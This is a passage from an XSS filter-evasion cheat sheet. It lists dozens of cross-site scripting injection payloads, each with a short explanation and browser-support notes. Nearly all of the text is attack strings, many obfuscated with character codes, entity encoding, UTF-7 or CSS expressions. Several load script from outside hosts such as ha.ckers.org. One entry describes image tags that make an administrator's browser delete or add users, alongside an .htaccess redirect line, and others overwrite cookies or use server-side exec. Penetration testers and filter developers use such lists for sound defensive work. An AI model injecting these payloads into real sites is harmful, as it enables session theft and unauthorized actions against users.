- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - SCRIPT w/Char Code - <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> - Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - BASE - <BASE HREF="javascript:alert('XSS');//"> - Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - BGSOUND - <BGSOUND SRC="javascript:alert('XSS');"> - BGSOUND - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - BODY background-image - <BODY BACKGROUND="javascript:alert('XSS');"> - BODY image - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - BODY ONLOAD - <BODY ONLOAD=alert('XSS')> - BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." 
to accomplish the XSS attack) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - DIV background-image 1 - <DIV STYLE="background-image: url(javascript:alert('XSS'))"> - Div background-image - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - DIV background-image 2 - <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> - Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - DIV expression - <DIV STYLE="width: expression(alert('XSS'));"> - Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression" - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - FRAME - <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> - Frame (Frames have the same sorts of XSS problems as iframes). 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IFRAME - <IFRAME SRC="javascript:alert('XSS');"></IFRAME> - Iframe (If iframes are allowed there are a lot of other XSS problems as well). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - INPUT Image - <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> - INPUT Image - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG w/JavaScript Directive - <IMG SRC="javascript:alert('XSS');"> - Image XSS using the JavaScript directive. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG No Quotes/Semicolon - <IMG SRC=javascript:alert('XSS')> - No quotes and no semicolon - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG Dynsrc - <IMG DYNSRC="javascript:alert('XSS');"> - IMG Dynsrc - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - IMG Lowsrc - <IMG LOWSRC="javascript:alert('XSS');"> - IMG Lowsrc - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - IMG Embedded commands 1 - <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> - This works 
when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG Embedded commands 2 - Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser - IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG STYLE w/expression - exp/*<XSS STYLE='no\xss:noxss("*//*"); -xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> - - IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop). 
- - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - List-style-image - <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS - - Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - IMG w/VBscript - <IMG SRC='vbscript:msgbox("XSS")'> - VBscript in an image - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - LAYER - <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> - Layer (Older Netscape only) - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - Livescript - <IMG SRC="livescript:[code]"> - Livescript (Older Netscape only) - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - US-ASCII encoding - %BCscript%BEalert(%A2XSS%A2)%BC/script%BE - Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. 
Apache Tomcat is the only known server that transmits in US-ASCII encoding. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>] - - - - META - <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> - The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - META w/data:URL - <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> - This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - META w/additional URL parameter - <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> - Meta with additional URL parameter. 
If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Mocha - <IMG SRC="mocha:[code]"> - Mocha (Older Netscape only) - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - OBJECT - <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> - If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - OBJECT w/Embedded XSS - <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> - Using an OBJECT tag you can embed XSS directly (this is unverified). - - - Browser support: - - - Embed Flash - <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> - - Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). 
Demo: http://ha.ckers.org/weird/xssflash.html : - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - OBJECT w/Flash 2 - a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d); - - Using this action script inside flash can obfuscate your XSS vector. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - STYLE - <STYLE TYPE="text/javascript">alert('XSS');</STYLE> - STYLE tag (Older versions of Netscape only) - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - STYLE w/Comment - <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> - STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - STYLE w/Anonymous HTML - <XSS STYLE="xss:expression(alert('XSS'))"> - Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - STYLE w/background-image - <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> - - STYLE tag using background-image. 
- - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - STYLE w/background - <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> - - STYLE tag using background. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Stylesheet - <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> - Stylesheet - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Remote Stylesheet 1 - <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> - Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Remote Stylesheet 2 - <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> - Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. 
As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Remote Stylesheet 3 - <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> - Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Remote Stylesheet 4 - <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> - Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - TABLE - <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> - Table background (who would have thought tables were XSS targets... except me, of course). 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - TD - <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> - TD background. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - XML namespace - <HTML xmlns:xss> -<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> -<xss:xss>XSS</xss:xss> - -</HTML> - XML namespace. The .htc file must be located on the server as your XSS vector. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - XML data island w/CDATA - <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> - -</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> - XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo. 
- - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - XML data island w/comment - <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> - -<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> - XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - XML (locally hosted) - <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> -<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> - - Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - XML HTML+TIME - <HTML><BODY> -<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> - -<?import namespace="t" implementation="#default#time2"> -<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> - - HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work. 
- - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Commented-out Block - <!--[if gte IE 4]> -<SCRIPT>alert('XSS');</SCRIPT> -<![endif]--> - - Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Cookie Manipulation - <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> - - Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Local .htc file - <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> - This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute. 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Rename .js to .jpg - <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> - Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - SSI - <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> - - SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - PHP - <? echo('<SCR)'; -echo('IPT>alert("XSS")</SCRIPT>'); ?> - - PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - JavaScript Includes - <BR SIZE="&{alert('XSS')}"> - &JavaScript includes (works in Netscape 4.x). 
- - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - Character Encoding Example - < -%3C -&lt -&lt; -&LT -&LT; -&#60 -&#060 -&#0060 - -&#00060 -&#000060 -&#0000060 -&#60; -&#060; -&#0060; -&#00060; -&#000060; -&#0000060; -&#x3c -&#x03c -&#x003c -&#x0003c -&#x00003c -&#x000003c -&#x3c; -&#x03c; - -&#x003c; -&#x0003c; -&#x00003c; -&#x000003c; -&#X3c -&#X03c -&#X003c -&#X0003c -&#X00003c -&#X000003c -&#X3c; -&#X03c; -&#X003c; -&#X0003c; -&#X00003c; -&#X000003c; -&#x3C - -&#x03C -&#x003C -&#x0003C -&#x00003C -&#x000003C -&#x3C; -&#x03C; -&#x003C; -&#x0003C; -&#x00003C; -&#x000003C; -&#X3C -&#X03C -&#X003C -&#X0003C -&#X00003C -&#X000003C - -&#X3C; -&#X03C; -&#X003C; -&#X0003C; -&#X00003C; -&#X000003C; -\x3c -\x3C -\u003c -\u003C - All of the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?). - - - Browser support: - - - Case Insensitive - <IMG SRC=JaVaScRiPt:alert('XSS')> - Case insensitive XSS attack vector. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - HTML Entities - <IMG SRC=javascript:alert(&quot;XSS&quot;)> - HTML entities (the semicolons are required for this to work). 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Grave Accents - <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> - Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Image w/CharCode - <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> - If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - UTF-8 Unicode Encoding - <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> - - UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). 
- - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Long UTF-8 Unicode w/out Semicolons - <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> - - Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - DIV w/Unicode - <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> - DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail. 
- - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Hex Encoding w/out Semicolons - <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> - - Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - UTF-7 Encoding - <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- - - UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Escaping JavaScript escapes - \";alert('XSS');// - Escaping JavaScript escapes. 
When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - End title tag - </TITLE><SCRIPT>alert("XSS");</SCRIPT> - This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - STYLE w/broken up JavaScript - <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> - STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Embedded Tab - <IMG SRC="jav 